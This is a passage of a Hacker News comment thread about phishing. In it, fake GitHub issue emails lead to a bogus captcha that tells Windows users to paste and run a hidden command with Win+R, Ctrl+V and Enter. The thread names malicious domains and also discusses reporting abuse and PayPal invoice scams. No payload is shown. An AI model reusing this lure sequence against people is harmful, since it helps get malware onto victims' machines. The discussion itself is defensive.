| To continue your analogy, child safety locks exist to
| minimize avoidable catastrophic situations for those
| unable to do same.
|
| > ... with that power you have to accept that if you end
| up hosing the system the problem is you because Windows
| doesn't even pretend to really protect you.
|
| At first glance, this has a "victim blaming" flavour to
| it along the lines of "you should have known better." A
| more concerning implication is that this perspective does
| not take into consideration what happens when a blackhat
| attack is perpetrated.
|
| What benefit is "the sheer power to hose Windows with a
| single Powershell line" when it is not you whom executes
| it?
|
| 0 -
| https://docs.freebsd.org/en/books/handbook/introduction/
| Dalewyn wrote:
| You will have to excuse me for effectively ignoring the
| rest of your comment since what I'm about to point out
| more than makes up for the things you pointed out.
|
| >What benefit is "the sheer power to hose Windows with a
| single Powershell line" when it is not you whom executes
| it?
|
| The benefit is the sheer power to hose Windows with a
| single Powershell line.
|
| In case that doesn't make sense, let me put it this way:
| The benefit is the power to do whatever you want with
| Windows.
|
| Windows essentially will not say no to what you ask of
| it, you have the freedom to do with your computer as you
| desire with Windows. With this power, this freedom, this
| virtue comes responsibility. _You_ as the user must
| secure the system as desired from the ground up, you have
| the power to do so and the responsibility.
|
| Computers are tools, Windows enabling your ability to use
| your computer as a tool is a virtue that is priceless
| especially in this day and age.
|
| If you don't believe me, consider that Windows brought
| forth the era of personal computing to the commons and
| continues to enable them by nurturing an ecosystem that
| can cater to almost all users' desires that now spans
| literally decades.
| bradjohnson wrote:
| I truly don't understand your desire to remove Linux file
| permissions. I also don't get why you think it's
| difficult to do so. There are plenty of ways for you to
| enable yourself to hose your machine without having to
| enter a password.
| kbolino wrote:
| > Windows from the start places the user at the controls
|
| Would this be the same Windows that now requires TPM2,
| UEFI Secure Boot, a Microsoft account to log in, and a
| special boot mode to use drivers not signed by Microsoft?
| gerdesj wrote:
| "I could see junior developers falling for this" - I can see
| all sorts fucking up, not just juniors. It is the way of
| things.
|
| "I don't think that...". I think that you have to train your
| troops effectively in what is harmfull.
|
| "Windows" - yes. I have been asked by at least two of my
| employees to get them away from Windows. I'll do my best. Its
| been a long running project but I will succeed.
| rpigab wrote:
| This captcha is so bad... I'm gonna automate the solving of
| this captcha so whenever my browser shows me "Press Win+R,
| CTRL+V <enter>", it automatically runs cmd.exe with the
| clipboard content so I can get to the site content faster and
| with no interruption.
|
| Yes, I'm a 10X Windows user.
| joshdavham wrote:
| These hackers need to work on the rest of their funnel lmao.
| Getting me to click the link would be easy, but running that
| script? Never in a million years!
| rwestergren wrote:
| One one hand, I can see the captcha is easy to fall for. On the
| other, nothing says "prove you aren't a machine" like "run this
| code that a machine could easily run."
| latexr wrote:
| > In text form (link altered for your safety)
|
| Might want to change the image too, macOS recognises the link in
| that and makes it clickable. I'd say that's more dangerous than
| modifying it in the text of the post, you could just as well
| include a non-clickable text link.
| johnklos wrote:
| Can be summarized with: Don't click on links in email.
|
| So is github-scanner.com (and github-scanner.shop) still the same
| malicious party? It seems to be. Funny that their DNS is hosted
| by Cloudflare (who, famously, don't host anything, because they
| think we're all dumb). Cloudflare, who take responsibility for
| nothing, has no way to report this kind of abuse to them.
|
| The domain which hosts the malware, 2x.si, both uses Cloudflare
| for DNS and is hosted by Cloudflare. At least it's possible to
| report this to Cloudflare, even though they rate limit humans and
| have CAPTCHAs on their abuse reporting forms.
|
| Sigh. Thanks to Cloudflare, it's trivial these days to host
| phishing and malware.
| elashri wrote:
| I don't know how effective and quick to respond but there is a
| way to report malware [1]
|
| Extracting from the page
|
| > Which category of abuse to select > Phishing & Malware
|
| https://www.cloudflare.com/trust-hub/reporting-abuse/
| johnklos wrote:
| Cloudflare's abuse form will not let you submit the report if
| you don't include a URL that currently points to their
| network. There're no options for phishing / scam domains for
| which they're the registrar and/or DNS hosting.
| ToValueFunfetti wrote:
| I haven't tested the form, but they do claim you can report
| abuse of the registrar with some of the options, perhaps
| they've changed it?
|
| Failing that:
|
| > If Cloudflare is listed as the registrar on an ICANN
| WHOIS listing, you also can email reports related to our
| registrar services to registrar-abuse@cloudflare.com
| spoonfeeder006 wrote:
| So how do you not click links to confirm your email for a new
| account?
|
| Rather one could use Qubes OS and only open links in disposable
| VMs and never enter info beyond that
|
| Thats basically what I do when I get emails to confirm my email
| address for a new account
|
| One can't always avoid clicking links can they?
| bentcorner wrote:
| > _So how do you not click links to confirm your email for a
| new account?_
|
| Fair question, but the "don't click links in email" is for
| emails that you don't expect. And sure, that's an
| unsatisfying answer because it's hard to communicate this
| wisdom to your grandmother.
|
| I think the best answer is defense-in-depth. Ensure you use
| updated email clients, browsers, and OS, and employ a dns
| blocker like a pihole or equivalent public service.
|
| For less-savvy people a device like an iPad or Chromebook can
| be a reasonable defense.
| hunter2_ wrote:
| If I'm being honest, "don't click links in email unless you
| were expecting that particular email message" seems easier
| for grandma than "update x, y, and z, and use Pihole"
| unless you want to administer her network and devices. But
| maybe you're saying that an iPad/Chromebook can mitigate
| all of the above needs? A little bit.
|
| Anyway, while I haven't heard of any cases yet, it wouldn't
| surprise me if senders of phishing email someday manage to
| deliver messages shortly after detecting some traffic (DNS
| lookup?) that you legitimately make with the entity the
| email is spoofing. Then you're expecting it, roughly.
| johnklos wrote:
| It is a bit easier, at least. My almost 90 year old Mom
| now knows to be suspicious of email and to not believe
| email unless she has a reason to think she should be
| getting it.
|
| To be fair about setting up a Pihole or some other form
| of DNS filtering, that's something that the network
| administrator should do, not individual users. It's a
| shame that it's still not trivial - companies that make
| NAT routers resist building in things that they don't
| completely control, so a configuration page for Pihole in
| your NAT router's web interface likely isn't coming soon.
| I hope that changes.
|
| Mom also understands that someone taking over her
| Nextdoor account would be a nuisance, whereas someone
| taking over her banking account would be significantly
| more problematic, so the more important something is, the
| more time she'll take to ascertain its authenticity.
|
| I practice explaining these things because I do it often.
| One interesting observation is that Mom believes me, so
| she does the things I suggest, whereas younger people
| think they know better, so they generally don't put much
| energy in to my suggestions. I'm working on ways of
| showing people that they're not necessarily safe because
| they're "doing the same things they've always done, and
| nothing bad has happened yet".
| hunter2_ wrote:
| > a configuration page for Pihole in your NAT router's
| web interface likely isn't coming soon. I hope that
| changes.
|
| In the meantime, the majority of routers do allow you to
| specify the DNS resolver instead of using whatever it
| learns via WAN DHCP, so you could put in a filtered
| public resolver (as opposed to your own Pihole instance)
| which gives pretty similar results if you don't need to
| whitelist anything. Plus, you can do the same on mobile
| devices that roam beyond that router (and avoid VPN
| through said router). I've been using dns.adguard-dns.com
| (94.140.14.14 and 94.140.15.15) [0]. They were founded in
| Moscow but now operate out of Cyprus (EU) and I don't
| have much of a reason to trust any other DNS operator
| more than them.
|
| [0] https://adguard-dns.io/en/public-dns.html -- "method
| 2"
| poincaredisk wrote:
| Cloudflare is way more responsive to abuse requests than 95% of
| country level DNS registrars. Having experience working with
| both.
| TiredOfLife wrote:
| 95% more responsive than 0 is still 0.
| ipdashc wrote:
| > Don't click on links in email.
|
| Not saying you're wrong per se, but isn't it more so summarized
| with "don't fall for a 'CAPTCHA' that requires you to paste
| code into the window labeled 'This will run with administrative
| privileges'?"
|
| This is more so a grumble than a serious comment on security,
| but agh, it's always bugged me that the metric for failing
| phishing tests is "clicked on any link in the email" and not,
| you know, entered credentials into the phish site, or
| downloaded and opened a file. Like, I get it, it's much easier
| to teach nontechnical users to simply not click bad links than
| that other stuff - and browser vulns do exist - but it still
| vaguely annoys me.
|
| I feel like I've seen countless posts like this one that end in
| the user entering creds, giving the browser some weird
| permission, downloading some file (sometimes straight-up an
| executable), or in this case, running a command. I don't know
| if I've seen a single one that ends in "and then they clicked
| the link and it popped a browser 0-day and that was the end of
| that".
|
| Web browsers are a wide attack surface, yes, but they're
| also... intended for browsing the Internet. Most people click
| through links pretty haphazardly as they're doing work or
| researching a topic. Defense in depth and all, but I feel like
| a security policy that holds "don't visit any evil websites
| ever" as a core tenet is pretty flawed.
| fforflo wrote:
| While we're here: what happened to the GitHub explore newsletter?
| I really enjoyed this, but I've stopped receiving it for a few
| months now. And I don't think I unsubscribed.
| wazdra wrote:
| Fun how Microsoft is on both ends of the "exploit"
| avazhi wrote:
| If you're stupid enough to paste something off a random website
| (that you discovered through a random email link) into the
| command line (and then execute it), then you deserve what happens
| next. At some point the end user is to blame.
|
| I also have no clue why any reasonable person would refer to that
| monstrosity as a CAPTCHA.
| AlienRobot wrote:
| >verification steps >winkey+R >Ctrl+V >enter
|
| Of all things that seem legit, this seems the legitest.
| xwall wrote:
| OMG! I was getting similar GitHub notification emails, saying
| detected vulnerability in your repo, but never figured it out as
| fake before this news, anyway I never clicked because I'm a lazy
| programmer :), once it's written it's written I do rewrite the
| code but don't find bugs and fix in my code. :D
| romantomjak wrote:
| The GitHub security alert digest[1] is a real thing. It's a
| feature of GitHub where they report security vulnerabilities in
| your project's dependencies. For example, if you use python and
| you have specified requests library in your requirements.txt,
| GitHub will send you emails about disclosed vulnerabilities in
| that library, urging you to upgrade to a higher version where
| it's fixed.
|
| [1] https://docs.github.com/en/code-
| security/dependabot/dependab...
| bickett wrote:
| No org is safe, not even Github..
| dabbz wrote:
| I've also been seeing Typeform emails coming from spam sources.
| Somehow people are using Typeform's positive reputation score to
| send emails to arbitrary emails.
| halostatue wrote:
| I turned off _most_ GitHub emails and mostly use the Notification
| Centre for discovering things I need to know about. It 's not
| _entirely_ proof against phishing this way, but it doesn 't get
| to use email to appear more legitimate.
| mfi wrote:
| This has happened for a while. In February of this year, the same
| attack vector was used in an attack to trick developers into
| thinking that they'd got a job offer from GitHub:
| https://www.xorlab.com/en/blog/phishing-on-github
| dooer wrote:
| woah
| consumerx wrote:
| so many red-flags, i don't know how someone could go beyond and
| click this link.
| rnts08 wrote:
| It's quite sad that in 2024 we still have people falling for the
| simplest tricks.
|
| This is almost as easy as it was to call someone and asking them
| for the number of the modem on their desk and their logins back
| in the bad old days.
|
| Considering the target platform I'm not overly surprised though.
| jonny_eh wrote:
| It's quite sad that in 2024 that HN commenters still blame the
| victim, especially when the original author does a great job
| suggesting small changes that Microsoft can make to make their
| products safer for their users.
| veltas wrote:
| I got a much more convincing email from PayPal recently, someone
| sent a quote (apparently a feature that can be used unsolicited),
| and set their company name to something like "PayPal need to get
| in touch about a your recent payment of $499.00, please call
| +1-....", so this is most of the text at the top because their
| quotes email is "<name> is sending you a quote for $xxx".
|
| This email came from the real PayPal.com, how they haven't gotten
| on top of usernames like that is beyond me for a payment
| processor. I reported it to them but haven't heard anything back,
| hopefully they banned that account but they should ban all names
| like that.
|
| This email honestly was formatted to look like a legit PayPal
| email, I have to imagine that scam will trick a lot of normal
| people.
|
| Get in touch, see my bio website, if you want the email.
| akimbostrawman wrote:
| >This email honestly was formatted to look like a legit PayPal
| email,
|
| this is why anything but plain text should be blocked in emails
| (besides security reasons). anybody with 5 minutes of HTML
| experience can create "legit looking" emails.
| sofixa wrote:
| It was an actual email sent by PayPal via a service they
| propose (sending invoices), just with a smartly crafted
| company name that made it look it's from them. No HTML was
| required from the attacker.
| veltas wrote:
| Legit looking because it was formatted by PayPal themselves,
| and also sent from PayPal.com.
| guappa wrote:
| I'd be surprised if someone looked at it.
| davidd_1004 wrote:
| Had this happen to me over a year ago so I assume reporting it
| to them did nothing :)
| reportgunner wrote:
| Why would paypal email you to call them ? If they want
| something from you they should either call you or email it to
| you or show it in their portal.
| veltas wrote:
| I don't know, most PayPal customers wouldn't know either. And
| the point is that these emails are designed to look legit and
| _also_ scare you into taking action without thinking about it
| too hard. And this particular email bypasses a lot of the
| rules in general consciousness about phishing like "check
| for spelling mistakes, check the sender email, does it look
| official, does it mention you by name", all of those boxes
| are ticked. This is only possible because PayPal clearly
| aren't actively fighting against these kinds of attacks.
| dyingkneepad wrote:
| I got a very similar thing: a legit email from PayPal, but it's
| an invoice and not a quote. And when you login to PayPal the
| website shows nothing.
| 1f60c wrote:
| Nice writeup! It reminded me a bit of Julia Evans' blog in terms
| of content (learning by teaching).
| jonathanlydall wrote:
| Just this morning I logged a bug on a GitHub repo and within a
| minute someone responded with something to the effect of:
|
| Try this, I think it will fix your issue (install GCC if you need
| a compiler): (Bitly link redirecting to zip file on mediafire)
| Pass: (something)
|
| GitHub processed my abuse report within an hour and removed all
| posts by that user.
| meindnoch wrote:
| Not hijacked. Faked.
| Thomashuet wrote:
| Their claim that nothing tells you the email corresponds to the
| new issue is wrong, the "(Issue #1)" in the title means exactly
| that. I have actually received the same email myself and
| immediately recognized it as a new issue created on the repo.
| This user is obviously not used to GitHub issues as is made clear
| by the fact that this is the first issue on this repo. I guess
| GitHub needs to do a better job teaching new users.
| selykg wrote:
| True, but I have worked at companies who employ users that
| maybe aren't entirely up to speed on the technical details and
| they have GitHub account's for submitting bug reports. This
| would very easily fool some of these people.
|
| Technical people might spot this, but that also isn't a free
| pass for GitHub to not do better here.
| ezekiel68 wrote:
| An excellent slashvertisement for Virus Total. Wrapped in an
| important cautionary tale about how GitHub issues can be
| manipulated to try to spread malware.
___________________________________________________________________
(page generated 2024-09-20 23:01 UTC)